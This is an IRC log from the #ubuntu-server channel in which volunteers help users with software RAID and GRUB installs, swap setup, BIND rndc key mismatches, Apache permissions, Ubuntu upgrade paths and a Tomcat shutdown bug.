<ivoks> (grmph... we should have vim-tiny by default in server)
<[Solaris]> vi for the wind!
<[Solaris]> err win
<[Solaris]> err helps if i remember all my vi cmd
<ivoks> i - insert
<ivoks> shift g - last line
<ivoks> o - open new line underneeth current, with insert
<ivoks> esc - exit insert
<ivoks> :wq - save and quit
<ivoks> basicaly, you need:
<ivoks> shift g
<ivoks> o
<ivoks> /dev/md0 /boot ext3 relatime 0 0
<ivoks> [Esc]
<ivoks> :wq
<[Solaris]> done
<[Solaris]> heh the other two are done via UUID numbers :P
<ivoks> don't worry about that now
<ivoks> we'll change that later
<ivoks> now, try reinstalling grub
<ivoks> in installer
<[Solaris]> heh
<[Solaris]> find /grub/stage1
<[Solaris]> worked!
<[Solaris]> on all 4 drives
<ivoks> forget that now
<ivoks> quit the grub
<ivoks> alt+f1
<ivoks> and try reinstalling grub
<ivoks> everything should work now
<[Solaris]> gah dunno what happen it took me bakc to partition disks
<[Solaris]> i walked out the room for a sec
<[Solaris]> lemm try again
<[Solaris]> think with all that previous mounting and unmounting i unmounted /target?
<ivoks> wouldn't it be easier just to start again with partitioning and installing?
<ivoks> and this time with /dev/md0 as a mountpoint
<ivoks> you won't have to partition everything again, since you allready did
<[Solaris]> thats what i am doing now..
<ivoks> don't forget marking /dev/md0 as /boot mountpoint
<[Solaris]> it didnt touch /boot or / ... some reason it formated the swap
 * [Solaris] shrug
<ivoks> maybe you didn't select 'No, format it' on 'Keep data?' question :)
<ivoks> just bellow the mountpoint option
<[Solaris]> prolyl
<[Solaris]> cuase i didnt' go into /swap
<ivoks> it always formats swap
<[Solaris]> i wonder if this going to rewrite /etc/fstab
<ivoks> it will reinstall everything :)
<[Solaris]> ohh boy
<[Solaris]> wife might be awake be the tme this is done :P
<ivoks> well, you should've be carefull first time :)
<[Solaris]> not holding my breath till this done :p
<[Solaris]> "debootstrap warning"
 * [Solaris] sighs
<[Solaris]> going to start over
<ivoks> :D
<[Solaris]> somehow it lost /target
<ivoks> when you enter partitioning now
<ivoks> first thing you have to do is go to 'Manual'
<ivoks> and then 'Software RAID setup'
<ivoks> this will activate your raid devices you've created before
<[Solaris]> i am almost to that point
<[Solaris]> there now
<ivoks> great... did you activate them?
<[Solaris]> yea
<[Solaris]> setting mount points
<[Solaris]> should I also include labels
<ivoks> choose format partition
<[Solaris]> e.g. /boot be labeld "boot"
<ivoks> no need, labels are old and bad :D
<[Solaris]> heh
<ivoks> you can have two disks with same label :)
<ivoks> don't forget /boot mountpoint for /dev/md0 :D
<[Solaris]> heh i didn't
<[Solaris]> went down the list
<[Solaris]> formating them now
<ivoks> great... that's should be ok now
<ivoks> i'll be here for next 10 minutes, if you need any help
<\sh> now I have to patch heartbeats ldirectord to recognize adobe fms admin calls...crap
<[Solaris]> ivoks heh it'll take more then 10 mins to reach the grub install step.. .but i'll keep you on speed-dail
<ivoks> [Solaris]: hit alt+f2
<ivoks> and run 'mount'
<[Solaris]> kk
<ivoks> if /dev/md0 is mounted to /target/boot
<ivoks> then everything should be fine
<ivoks> you can double check with 'cat /proc/mdstat'
<ivoks> yo check if md0 is really raid1 :D
<[Solaris]> heh gotta wait till the system are formated
<ivoks> ah... ext3 for /?
<[Solaris]> yepp
<ivoks> i always choose XFS when i'm dealing with large partitions
<ivoks> so that formating is the longest process in instalation?
<ivoks> i was wondering how come your installation lasts for 30 minutes... it's usually done in max. 15 :)
<[Solaris]> heh
<[Solaris]> root is 1.2TB ext3
<[Solaris]> takes a bit to formate
<ivoks> 'a bit' :)
<\sh> xfs is the best for this
<ivoks> right
<[Solaris]> well all raids are active and the correct type
<\sh> /dev/drbd0            6.9T   74G  6.8T   2% /webzooms
<\sh> hehe
<[Solaris]> now now don't get me jealous
<ivoks> i have one non-drbd 7TB
<[Solaris]> having a hard enough time with grub :P
<[Solaris]> everything is mounted correctly
<ivoks> \sh: if you are using drbd, check out (and help with) https://bugs.edge.launchpad.net/ubuntu/+source/drbd8/+bug/271254
<uvirtbot> Launchpad bug 271254 in drbd8 "drbd doesn't start: "No response from the DRBD driver! Is the module loaded?" but module is loaded" [High,Confirmed]
<ivoks> :)
<ivoks> [Solaris]: still formating?
<\sh> ivoks: did he do the first sync ?
<[Solaris]> ivoks nope its done
<ivoks> \sh: the sync isn't the problem
<ivoks> \sh: drbd userland just doesn't see drbd
<\sh> ivoks: I do run drbd8 and never had the problem...
<ivoks> \sh: this is intrepid
<\sh> bah
<\sh> kernel ;9
<ivoks> i also think it's a kernel issue
<ivoks> we took the bullet taking 2.6.27 :/
<ivoks> [Solaris]: then check with mount if /dev/md0 is mounted to /target/boot
<[Solaris]> [05:36:20] <[Solaris]> everything is mounted correctly
<ivoks> ok, ok :)
<ivoks> didn't see that one
<\sh> ivoks: seems so
<ivoks> well... bbl guys
<ivoks> [Solaris]: happy ubuntuing ;)
<[Solaris]> heh thanks for yhe help
<\sh> aye...I don't need to patch ldirectord ;)
<[Solaris]> \sh besides irssd any recommendation for irc clients?
<\sh> [Solaris]: depends what you want...UI or text...if text==irssie
<\sh> if UI: xchat  quassel konversation
<[Solaris]> got pretty used to GUI interfaces ...
<[Solaris]> slowly changing back over
<zzgvh> Is it possible to mount a RAID1 partition on the host form a KVM guest and if so how should the /etc/libvirt/qemu/guest.xml for that look?
 * flyback dies laughign again at the sound of mickey mouse humping on family guy
<zeroTheHero> hi all,
<He1lBound> can I upgrade hardy ubuntu to hardy ubuntu server?
<HellMind> can I upgrade hardy ubuntu to hardy ubuntu server?
<_ruben> HellMind: sudo apt-get install linux-server .. that'd install the server kernel ..
<HellMind> ty
<HellMind> is there any big differences between server and normal version?
<HellMind> im trying to install ubuntu server on a routeros xen host
<_ruben> desktop and server differ in that they have slightly different kernels, and a different set of base applications, but since they use the same repositories, one can be turned into the other 'easily'
<HellMind> ok
<HellMind> anyone installed ubuntu server on xen host?
<_ruben> probably tons of ppl, i never used xen though ;) .. might wanna try in #ubuntu-virt as well, tho that channel isnt that active either most of the time
<Deeps> there are issues with ubuntu hardy and xen, look on launchpad, i forget the bugid
<HellMind> :(
 * [Solars] is curious now on the real difference in kernels and which apps are used between server and non-server
<uvirtbot> New bug: #274069 in dhcp3 (main) "kernel release > 2.6.27-2" [Undecided,Confirmed] https://launchpad.net/bugs/274069
<Kapli> I have a problem, on my router I have ports which are opened on specific internal IP's. Sometimes when for example the power goes out and the router resets and such my server gets a different internal IP. Is there any way to get my server to just get the internal IP that I want it to?
<[Solars]> have the dhcp assign a static ip address
<Kapli> exactly how do i do that? :)
<[Solars]> not 100% sure :P
<Kapli> i used the command $sudo ifconfig eth0 192.168.10.100 but can i be sure that like if power goes out or something that my server doesnt accept any other ip than that one?
<[Solars]> erm i can think you can hardcode your eth0 (again not sure how todo it (been years since i played with *nix))
<[Solars]> also you can edit...erm can't remember the file that runs commands after boot... and add that line to adjust the ip
<Kapli> well see my problem right now
<Kapli> is that i have opened port 80 on 192.168.10.100
<Kapli> and when i typed ifconfig on my server it said 192.168.10.102
<Kapli> and so if i typed that address in my address bar it would work for me ofc but my external ip wouldnt work for anyone else cuz ye 80 would be opened on 100 and thats not the ip my server had
<Kapli> so i typed the command and my ifconfig now says it has 192.168.10.100
<Kapli> but it doenst seem like anyone else can connect
<Kapli> how can i check if my server has internet
<Kapli> if i try to ping something it says unknown host, does that mean it doesnt have internet?
<[Solars]> can you open the port for your internal ip range?
<[Solars]> unable pings just means there wasn't a ctcp reply
<Kapli> ye thats my problem, i cant bcuz i lost the password to my customer pages and i cant request a new one until monday when they are at work
<Kapli> well how can i check my server has internet
<[Solars]> ohh erm, i'll let soemone else answer if they can help, I prolyl just getting in the way
<Kapli> i googled it and they suggest pinging
<Kapli> so if pinging doesnt work then it doesnt have net
<Kapli> cuz it worked before i changed the internal ip
<[Solars]> telnet
<[Solars]> ftp
<Kapli> telnet to what :D
<[Solars]> heh dunno
<Kapli> well rebooted, check if config and its 102 now, pinged google and got response, c
<Kapli> changed it to 100, pinged again and it says unknown host
<arico> hi, greetings for everybody
<arico> I have this question: has somebody an idea of how to sync ubuntu computer with UPD connected through serial port ???
<arico> * UPS I mean
<arico> * not UDP
<arico> how does this chat works??
<arico> does somebody helps??
<arico> or it's just p2p conversations ???
<J_5> what is he latest version of ubuntu server?
<Nafallo> 8.04.1
<Nafallo> even if "daily" is the absolute latest :-P
<kgoetz> arico: you ask a questino, and when someone thinks they can help, they answer
<kgoetz> latest stable is 8.04.1 (.2 i thought was out, was a mistaken?)
<Nafallo> yes.
<kgoetz> arico: and perhaps 'apt-cache search ups' will givce you some starting points
<Nafallo> you are thinking of 6.06.2
<kgoetz> Nafallo: thanks, i likely was.
<kgoetz> lease keep in mind that I do not have in hand either the
<kgoetz> full GPL text or the source code of the last mmv release (oops).
<kgoetz> er, sorry.
<kgoetz> win 27
<kgoetz> :| not my day
<arico> thanks kgoetz for your answer
<kgoetz> no worries
#ubuntu-server 2008-09-28
<r00tintheb0x> I freaking hate Yum.
<Nafallo> yum install apt IIRC
<r00tintheb0x> heh
<r00tintheb0x> My CEO MAKES me use CentOS.
<Nafallo> know the feeling
 * r00tintheb0x sighs.
<kgoetz> option one: new job. option two: smak the ceo a bit ;)
<Nafallo> we had cpanel on top...
<r00tintheb0x> Right.
<r00tintheb0x> cpanel is okay.
<r00tintheb0x> I work for a software dev company...
<Nafallo> no. it really isn't.
<r00tintheb0x> Thats good for webhosting though.
<Nafallo> cpanel is a pile of crap.
<r00tintheb0x> Yeah, it trashes things quite a bit.
<r00tintheb0x> lol!
<r00tintheb0x> I didn't want to offend anyone.
<r00tintheb0x> brb
<uvirtbot> New bug: #275349 in postfix (main) "postfix fails to start: chdir(/usr/libexec/postfix)" [Undecided,New] https://launchpad.net/bugs/275349
<[Solars]> \sh you awake?
<Dave10293> hello
<Dave10293> i need some assistance with my Ubuntu server installation.
<Dave10293> Is anyone willing to help me?
<kgoetz> !anyone
<ubottu> A large amount of the first questions asked in this channel start with "Does anyone/anybody..."  Why not ask your next question (the real one) and find out?
<Dave10293> I want to setup "Ubuntu-server-Hardy Heron" on a server machine, then I need it to serve a simple webpage display "Nagios", what is the best method of doing this + what will i need to install.
<kgoetz> doesnt nagios have its own front end?
<kaushal> hi
<kaushal> whats the command to see what all services has been started on ubuntu server
<Dave10293> Yes, I believe so
<kaushal> Dave10293, ???
<Dave10293> yeah
<Dave10293> i don't know that answer to that question
<kgoetz> kaushal: he was talking to me
<kgoetz> kaushal: do you mean `ps aux` ?
<kgoetz> Dave10293: tried `apt-get install nagios`?
<Dave10293> yeah, i
<Dave10293>  have
<kaushal> just like you have service-status-all
<kaushal> in redhat
<nxvl> there is a work on intrepid for this
<nxvl> you need to ask kirkland about it
<nxvl> but i hardy doubt he's arounf right now
<nxvl> but, you always send him an e-mail
<kaushal> nxvl, are you referring to me
<nxvl> yup
<kaushal> whats his emailid
<nxvl> s/hardy/hardly/g
<nxvl> his lp id is kirkland aswell, his e-mails are in there
<nxvl> launchpad.net/~kirkland
<nxvl> kaushal: he is based in the US so now it's late for him right now
<kaushal> ok
<kaushal> so is there any other option to know that
<nxvl> netstat -na | grep "LISTEN "
<nxvl> assuming that your system is in english
<nxvl> it will show you the open ports
<ropetin> Anyone have experience with OpenVPN?  I'd like to configure a client to run a script after connection (connect to file share, copy file if newer etc), but I can't seem to find where/how to do it
<kopa> ll
<kopa> oops ;-)
<scuser> hi all, I have scuser account and scuser principal, but the system authentication refuses to go through kerberos principal, although it goes through any other account such as test account and test principal, any help ?
<uvirtbot> New bug: #275418 in openssh (main) "Scp freezes on named pipe" [Undecided,New] https://launchpad.net/bugs/275418
<kirkland> kaushal: nxvl: http://manpages.ubuntu.com/manpages/intrepid/man1/service.html
<kirkland> kaushal: nxvl: service --status-all
<kaushal> kirkland, I am running Ubuntu 8.04 Server
<kirkland> kaushal: oh, sorry
<kirkland> kaushal: there isn't really anything already there for that
<kirkland> kaushal: you could try something like:
<kirkland> for i in `ls /etc/init.d`; do $i status; done
<phaidros> how to deal with missing linux-xen: Depends: linux-restricted-modules-xen (= 2.6.24.21.23) which is a virtual package. ??
<phaidros> obviously restricted modules are not there in the right version.
<phaidros> ah, it seems it is a multiverse dependency :-/
<phaidros> hm, so I know how to deal with it.
<phaidros> thanks for listening :)
<phaidros> well, I'm stuck with a chrooted raid1 server install. any mdadm gurus around?
<ivoks> what's up? :)
<phaidros> well, the problem was either I remounted proc wronlgy (-o bind instead of -t proc) *or* grub was to dumb to realize md0 is an array ..
<phaidros> well, I'd go for blaming myself :D
<phaidros> as this is a new machine, I have the chance to think about disk encryption for e.g. xen hosts .. bothering me is the problem of e.g. power outtages.
<phaidros> any ideas how to handle such a thing like remote machine with passwords needed on boot ?
<phaidros> argh, this damn mdadm always uses the whole disks as raid, not the configured partitions ..
<flyback> mmm
<flyback> xen owns your "canuck"
<flyback> least I have heard
<flyback> we use vmware server and esxi at work it's decent
<flyback> but I heard good things about sex
<phaidros> sex??
<phaidros> well, independent of which virtualization: how would a practicable encryption of vm devices look like?
<phaidros> ah, I now get more info from mdadm. there is somehow a raid0 still there. just from a first test ..
<phaidros> a771861a
<phaidros> sry. wrong paste :)
<phaidros> http://pastie.org/280874
<phaidros> how to get rid of it?
<phaidros> howto remove a mdadm definition of a hd (sda)
<phaidros> ?
<phaidros> :(
<phaidros> sudo mdadm --zero-superblock /dev/sda :)
<flyback> phaidros, sorry
<flyback> esx not sex
<flyback> brain fart
<flyback> I never understood linux's software raid tools well sorry
<flyback> but there are lots of channels and probably people here that can
<phaidros> flyback: yeah I find mdadm quite non-intuitive ..
<[Solars]> ivoks love raids :P
<[Solars]> apprently i screwd up something during the install
<[Solars]> my /dev/md2 is a raid 5 ment to be used as swap
<[Solars]> but it is not being mounted and its not being used
<[Solars]> best way to fix this?
 * flyback bbl
<phaidros> [Solars]: well, I'm all but an expert here :)
<phaidros> but: /usr/share/mdadm/mkconf (on ubuntu) cretes you a nice mdadm.conf for a setup arry
<[Solars]> phaidros the raid is already created
<[Solars]> its just not mounted
<[Solars]> dunno if i have to mod eth fstab or not
<[Solars]> or even how to mount it
 * flyback ponders how much crap he is going to break in his 2k vm doing a repair install of 2k noSP over 2k sp4 but since the vm died anyways guess it doesn't matter
<phaidros> [Solars]: did you create a swap inside? (mkswap /dev/mdX) and did you put it in fstab ?
<phaidros> [Solars]: you can check with swapon -a (enable all from fstab)
<phaidros> and: swapon -s (show all swaps)
<phaidros> fstab entry looks like this: # #/dev/sdb2       swap            swap    defaults,pri=1  0 0
<phaidros> or better, when you create the swap you get told an new UUID, so then use this in fstab:
<phaidros> UUID=5c30a82b-bb8c-4cd5-b418-cb667aa5ea9c pri=1            swap    sw              0       0
<phaidros> you can ignore the pri=1, I use it only, because I have 2 swaps, same prio
<phaidros> damn, the server kernel boots easily, xen not .. :(
<phaidros> the installation of mdadm *after* a new kernel in chroot should point out that initrd has be rebuilt !!!
<phaidros> :)
<[Solars]> erm phaidros sorry for the delay i'll look into that
<[Solars]> phaidros when i try to do swapon -a i get an error
<[Solars]> didn't do mkswap /dev/mdX
<[Solars]> the error is
<[Solars]> swapon: cannot canonicaliz /dev/disk/by-uuid/<some long alphanumeric string> no such file or directory
<[Solars]> also says it cannot stat it
<[Solars]> and looking in /etc/fstab
<[Solars]> it appearse that the /etc/md2 isn't mounted anywhere
<[Solars]> "UUID=<alphanumeric string> none swap sw 0 0
<[Solars]> \/me wonders ivok will come back :P
<uvirtbot> New bug: #275608 in openvpn (universe) "nm-openvpn swaps ca and cert in openvpn commandline" [Undecided,New] https://launchpad.net/bugs/275608
<phaidros> [Solars]: easy thing: the uuid of your fstab entry is not the same as of the actual swap partition
<phaidros> just mkswap again and use that uuid in fstab
<[Solars]> phaidros erm kk i'll try that again
<[Solars]> mkswap didn't work, "sudo mkswap /dev/md2" says area must be 40KB in size
<[Solars]> so i have a feeling this is a raid issue
<phaidros> [Solars]: what does cat /proc/mdstat say?
<phaidros> and: fdisk -l /dev/md2
<[Solars]> it says inactive
<[Solars]> for /dev/md2
<[Solars]> and fdisk -l shows nothig
<[Solars]> or rather returned nothing
<phaidros> inactive then it is not assembled
<phaidros> so, either try mdadm --assemble /dev/md2 /dev/sdaX /dev/sdbX [all devices]
<phaidros> or mdadm --assemble --scan
<phaidros> (it tries to guess)
<phaidros> hehe, I had alot to do with that mdadm last 20 hours :)
<phaidros> mdadm --create foo bar writes superblocks for the selected devices once and assembles them.
<phaidros> after that mdadm --assemle is the tool to enable this raid device
<phaidros> create is only used initially
<[Solars]> says its already active
<[Solars]> also appears that there are missing parts of raid in mdstat
<[Solars]> missing "sdd2"
<[Solars]> the line reads
<phaidros> hmmm
<phaidros> then further to things I didn't try myself :D
<[Solars]> md2 : inactive sda2[0] sdb2[2] sdc2[1]
<[Solars]> should be a raid 5 with 4 disks
<phaidros> hm, ok
<[Solars]> lemme fdisk sdd and see if it has the partition
<[Solars]> yepp its listed
<phaidros> mdadm --add /dev/md2 /dev/sdd2
 * [Solars] really should load up an irc client over there
<phaidros> get a shell, screen plus irssi :D
#ubuntu-server 2009-09-21
<giovani> StrangeCharm: Areca makes decent  stuff
<giovani> they make a 16-port PCIe/PCIx card
<Debolaz> Hrmm, what structure is recommended to use on an OpenLDAP directory if you have say 10 servers or so with different users but some in common?
<giovani> Debolaz: well they're all going to be in the LDAP directory I hope
<giovani> I'm not sure what type of answer you're looking for though
<Debolaz> giovani: Never really used LDAP before, except for playing a bit.. And while there's a plethora of tutorials available on how to set up the system to use LDAP, there's very little information about how the data should be structured.. No recommended standards, etc..
<giovani> Debolaz: that's far too huge of a topic to answer on irc
<giovani> there are 700-page books dedicated to LDAP design
 * Debolaz has a 500 page book about OpenLDAP that has nothing about this in it. 
<giovani> maybe it was the wrong book :)
<Debolaz> Hehe, well, I'm shooting in the blind here. :)
<Debolaz> At least it was very helpfull in setting up and making OpenLDAP work with the various services. :)
<giovani> great
<giovani> I mean typically you're gonna have an ou
<giovani> for users
<Debolaz> I don't suppose you have any good book recommendations?
<giovani> nope -- never bought an LDAP book -- but we have a lot of them at work -- not sure which would be of quality
<giovani> just learned by example
<Debolaz> Oh the joys of modernizing a server park.
<Debolaz> Well actually, it is quite fun.
<Debolaz> Started employing virtualization to better take adventage of the hardware we've got.
<BrixSat> hello
<BrixSat> any one able to help on dns?
<jmarsden> BrixSat: Don't ask to ask, just ask.  What is your real question?
<BrixSat> :p
<BrixSat> sorry
<BrixSat> http://pastebin.com/m4d9df416
<BrixSat> why tis?
<Level15> hi. why does aptitude choose not to upgrade packages as the kernel and bind?
<ScottK> Probably because new packages need to be installed.  Instead of aptitude upgrade, try aptitude dist-upgrade.
<Level15> ScottK: thanks, will try that
<BrixSat> http://pastebin.com/m4d9df416
<jmarsden> BrixSat: rndc not working is probably a configuration issue of some kind... they key has to be the same in both the bind config file and the rndc one...
<BrixSat> jmarsden where do iset the key?
<jmarsden> man rndc-confgen    and look under /etc/bind/ for all the config files.
<BrixSat> :)
<jmarsden> I'm pretty sure it should "just work" out of the box on Ubuntu, unless you manually configured something related to it, though.
<BrixSat> i have used ispcp :p
<jmarsden> I don't know what it is, I don't think that is a Ubuntu package in main or universe... but apparently it broke rndc for you.
<BrixSat> it is like cpanel a control panel for hosting
<BrixSat> but it was working fine
<BrixSat> i broke it then i mixed with the nameserver and apache config
<jmarsden> OK... so look for key statements in your named.conf and in /etc/bind/rndc.conf, maybe?  If both exist they need to specify the exact same key...
<BrixSat> :S they are the same
<BrixSat> my domain is www.opoeta.net
<jmarsden> Check permissions on the files, maybe?  Or remove the key stuff from named.conf completely (back it up somewhere first!), and then do    sudo rndc-confgen -a   and see if that fixes it?
<BrixSat> ok
<BrixSat> nothing :S
<jmarsden> OK... does ispcp do things with the files under /etc/bind, or does it install a non-standard bind and put config files somewhere else?  If it uses the ones under /etc/bind/, can you pastebin /etc/bind/named.* and /etc/bind/rndc.key so I can see them?
<BrixSat> it uses system bind
<jmarsden> OK.
<BrixSat> yes i can
<BrixSat> http://pastebin.com/f471177ea
<BrixSat> pastebin.com/f301dd305
<jmarsden> So... you think that "Q/xVOF1uUAv89CFuy02pag==" and "pkVeO3RyPavpE4z4nsY04g==" are the same??
<jmarsden> Those two keys are different :)
<BrixSat> :|
<jmarsden> Edit one or the other file to make them the same, and restart bind
<BrixSat> wich one has the pk....
<jmarsden> /etc/bind/rndc.key has the one starting with pk
<jmarsden> The one you pasted at http://pastebin.com/f301dd305
<BrixSat> i have seen and i feel so stupid
<jmarsden> well, at least it should be an easy fix :)
<BrixSat> same :S
<jmarsden> You restarted bind after making the change?
<BrixSat> yes
<BrixSat> http://pastebin.com/md38f809
<jmarsden> I'm not sure what is happening, then, maybe remove the whole key and control stuff from the end of /etc/bind/named.conf, so it looks like http://pastebin.com/m69a98d12
<jmarsden> Or... well, does rndc status work now?
<jmarsden> The error you pasted was from the old bind stopping, not from the new one...
<jmarsden> Also check /etc/bind/named.local and /etc/bind/named.options in case they somehow have key stuff in them ??
<jmarsden> Make that /etc/bind/named.conf.options and /etc/bind/named.conf.local
<BrixSat> ok
<jmarsden> Incidentally, why are you needing to use an "ISP" control panel when you only seem to have a single domain?
<BrixSat> i will have other domains soon
<jmarsden> OK... in general adding a "control panel" from outside Ubuntu is adding extra complexity and a source of issues that you don't need... if you *really* need a web based admin UI, you could try ebox, which at least is an official Ubuntu universe package.
<jmarsden> But for less than a couple of hundred domains, some simple scripts and doing things at the command line is probably better still -- that way you know what is happening and can troubleshoot when anything breaks.  "Control panel" apps hide that from you...
<BrixSat> ebox :/
<jmarsden> If you don't like it, fine, use the command line :)
<BrixSat> :)
<BrixSat> ispcp is good for selling
<BrixSat> webhost space
<BrixSat> i got it to work
<jmarsden> OK.  i hope ispcp doesn't break it for you again...!
<BrixSat> no it was working :p
<BrixSat> after i mixed with A record~
<BrixSat> it stopped
<BrixSat> and then i rebooted and never more could put it to work
<jmarsden> OK... well, as long as you have it fixed now, I suppose all is well...
<BrixSat> hostname: Unknown host when i try to reconfigure the iscp :S
<jmarsden> As I said earlier:  <jmarsden> OK... in general adding a "control panel" from outside Ubuntu is adding extra complexity and a source of issues that you don't need...
 * Debolaz needs a control panel for managing web hosting customers
<Debolaz> Would ebox work for something like that?
<monostone> I have correctly installed and configured dnscache + tinydns. I have tested dnscache via a tail -f logfile, and it is correctly cacheing content. Now, I am setting up a development/test environment, so I am using internal IP's, but i can NOT manage, to get tinydns to resolve the domains on my local network (commands dnsq a host IP and dig @IP host return correct responses, but dnsqr host, dig host and dig @IP -x IP all fail). My
<monostone> resolv.conf has 127.0.0.1 defined as nameserver, i even added a search domain.internal, but nothing. I am forced to add the entry to the hosts file, but i want to avoid this, any ideas?
<monostone> how do permissions cascade with the directory entry in apache? I set <Directory /> and <Directory /var/www> as denied for all, then i configured <Directory /var/www/site1> as allowed by all, but i get permission denied. don't permissions cascade? with the last directory rule taking precedence?
<qman__> IIRC, set up that way, it should allow access to site1
<qman__> did you also check filesystem permissions?
<qman__> that can result in a 403 too
<monostone> qman__, aha, right, i completely overlooked that
<chindu> Am wondering if you can you update from 9.04 server to an lts build - say 10.04 when it's released?
<twb> chindu: there are two upgrade paths
<twb> chindu: LTS to LTS, or <release n> to <release n+1>
<twb> So you would need to upgrade to 9.10, and then from 9.10 to 10.04
<chindu> Thanks twb. Are there any compelling reasons to stick with 8.04 over 9.04? I'm going to be deploying in an Esx 3.5 environment.
<chindu> or vice versa
<twb> Yes: 8.04 is LTS, so it gets 5 years of support on the server.
<twb> That means you can avoid upgrading for five years.
<twb> (Upgrading is a great way to get new bugs.)
<chindu> Lol. So in an esx environment will I see any real benefit from the newer releases then or just cause myself more grief? May as well stick with LTS if no performance reasons to go to newer releases...
<twb> My rule for upgrading is: don't do it unless you can say what the benefits are gonna be
<twb> e.g. "my webdevs insist they need a newer version of PHP5"
<chindu> Am planning to run Postgres on one and the other will run Apache.
<chindu> I've not delved too much into the versions available but am I right in thinking that you don't get the newer product versions if you aren't on the latest but they keep up-to-date with all security fixes?
<twb> In principle, packages in the main category receive security updates in (say) hardy-security, backported to that version, until the package is EOLd.
<twb> *until the release is EOLd, rather
<twb> http://bazaar.launchpad.net/%7Enijaba/ubuntu-maintenance-check/trunk/ contains a little script to tell you when a package will stop receiving security updates
<chindu> @twb cool - thanks very much
<ttx> soren: do you plan to roll a new eucalyptus package today ? I could use the latest fixorz in my testing
<soren> ttx: I can.
<ttx> soren: I guess I'll be blocked by the various "403 Forbidden" bugs if I progress in testing ?
<soren> ttx: Probably.
<soren> Let me roll a new package..
<soren> ttx: Blimey.
<soren>  158 files changed, 7029 insertions(+), 4175 deletions(-)
<ttx> uh
<soren> uh, indeed :)
<ttx> its the merge with their dev branch ?
<ttx> I don't think we changed that much in ours :)
<soren> That's the diff from bzr746 to bzr808.
<soren> So from the most recent snapshot to a current one.
<ttx> ok
<soren> ttx: It doesn't compile.
<ttx> ...
<soren> ttx: It /seems/ to have grown a new dependency.
<soren> ttx: http://people.canonical.com/~soren/eucalyptus.txt
<soren> ttx: Ah, yes.
<soren> ttx: libc3p0-java is already a runtime dependency, but now it's probably become a build-time dep as well.
<soren> how things can move in that direction is beyond me, though.
<ttx> your analysis seems exact.
<soren> I can see how it can need stuff at build-time, but then not at runtime, but not the other way around.
<soren> Anyhow, I'm rebuilding now. If it works, I'll upload.
<Debolaz> Hmm, where can I read about what's new in 1.6?
<kaushal> hi
<kaushal> is the native package tomcat5.5 in Ubuntu 8.04 server have issue ?
<kaushal> somehow it takes lot of time to stop/start it
<kaushal> i install apt-get install sun-java5-jdk and tomcat5.5 on it
<kaushal> am i doing it correctly ?
<kaushal> is there a already raised bug
<_ruben> have you checked the bugtracker?
<kaushal> _ruben: is it launchpad ?>
<kaushal> ?*
<_ruben> yes
<soren> What's the problem, exactly? It takes a while to start it?
 * soren is hardly surprised, it being java and all
 * _ruben neither
<kaushal> soren: do i need to install sun-java6-jdk or sun-java5-jdk ?
<kaushal> for 5.5.25-5ubuntu1.1 ?
<soren> kaushal: Do you need either of them specifically?
<kaushal> yeah
<kaushal> i need sun-java5-jdk
<soren> Then you've just answered your own question, as far as I can see.
<soren> If you /need/ sun-java5-sdk, then yes, of course you should install it.
<kaushal> soren: i did install sun-java5-sdk but as i said when i try to stop tomcat service it doesnot stop
<soren> When did you say that?
<kaushal> 15:34 < kaushal> somehow it takes lot of time to stop/start it
<soren> "Takes a lot of time to stop/start" is hardly the same as "doesnot stop"
<soren> Which is it? Does it stop or doesn't it?
<kaushal> it doesnot stop
<soren> Ok. In that case, I'd file a bug.
<kaushal> soren: ok
<kaushal> Let me try installing sun-java6-jdk and see if it works
<kaushal> soren: where do i need to report a new bug ?
<soren> kaushal: On Launchpad.
<soren> https://bugs.launchpad.net/ubuntu/+source/tomcat5.5/+filebug
<soren> kaushal: Remember to include exactly which version of the packages you're using and which version of Ubuntu you're running on.
<ttx> might be bug 299866
<uvirtbot> Launchpad bug 299866 in tomcat6 "Tomcat fails to shutdown (can't connect to port 8009)" [Undecided,Fix released] https://launchpad.net/bugs/299866
<soren> Could be.
<soren> ttx: New eucalyptus uploaded.
 * soren wanders off for lunch
<kaushal> ttx: https://bugs.launchpad.net/ubuntu/+source/tomcat5.5/+bug/433906 is it ok ?
<uvirtbot> Launchpad bug 433906 in tomcat5.5 "init.d scripts doesnot stop tomcat (5.5.25-5ubuntu1.1) on Ubuntu Hardy 8.04 " [Undecided,New]
<ttx> kaushal: add information about which JVMs you have installed on the system, that will help to reproduce the issue
<ttx> otherwise that's a good start.
<kaushal> sure
<kaushal> ttx: please have a look at now https://bugs.launchpad.net/ubuntu/+source/tomcat5.5/+bug/433906 ?
<uvirtbot> Launchpad bug 433906 in tomcat5.5 "init.d scripts doesnot stop tomcat (5.5.25-5ubuntu1.1) on Ubuntu Hardy 8.04 " [Undecided,New]
<ttx> kaushal: ok
<kaushal> ttx: is that Bug correct ?
<kaushal> just curious to know
<ttx> kaushal: yes, it's filed correctly. Will have a look when I get a chance
<kaushal> sure
<kaushal> ttx: Thanks
<soren> ttx: Get 'em while they're fresh: https://edge.launchpad.net/ubuntu/+source/eucalyptus/1.6~bzr808-0ubuntu1/+build/1253738
<kaushal> ttx: when i start tomcat i see it as here http://paste.ubuntu.com/275171/
<Debolaz> soren: Do you know where I can read about what's coming in 1.6?
<kaushal> its not started as tomcat55 user
<kaushal> any ideas ?
<kaushal> I see it as root user
<kaushal> may be thats the issue ?
<soren> Debolaz: I don't know where there's a list, no.
<kaushal> ttx: you around ?
<kaushal> soren: hi again
<kaushal> shall i briefly discuss the issue ?
<soren> Um... No :)
<kaushal> when i start tomcat it starts as root user
<kaushal> so is there a way to fix it ?
<ttx> kaushal: it starts as root and spawns a process that runs as tomcat55.
<kaushal> ok
<ttx> soren: bug 431847 is a euca2ools issue. Works with ec2-api-tools
<uvirtbot> Launchpad bug 431847 in eucalyptus "Registering images gives 403 Forbidden" [High,Triaged] https://launchpad.net/bugs/431847
<ttx> I'll mark it as such.
<kaushal> what about tomcat 5.5 which does not stop ?
<kaushal> ttx: any way you will be looking at it
<ttx> kaushal: I didn't look into the issue yet. I'm kinda busy on other things.
<kaushal> sure
<zul> morning
<kaushal> np
<soren> zul: o/
<ttx> zul: yo
<soren> ttx: I'll push a new euca2ools to my ppa in 15 minutes. Can you retest with that, please?
<zul> hey soren and ttx
<ttx> soren: sure.
<zul> ahhh euca is filling up my inbox
<soren> zul: with love?
<zul> umm...yeah...you can say that
<soren> ttx: http://people.ubuntu.com/~soren/euca2ools_1.0+bzr20090921-0ubuntu1_all.deb
<ttx> soren: ack
<ttx> soren: same issue.
<ttx> euca-describe-images has the same problem, fwiw
<soren> ttx: Yes, I'm not seeing much improvement either. Did you use the fresh eucalyptus packages?
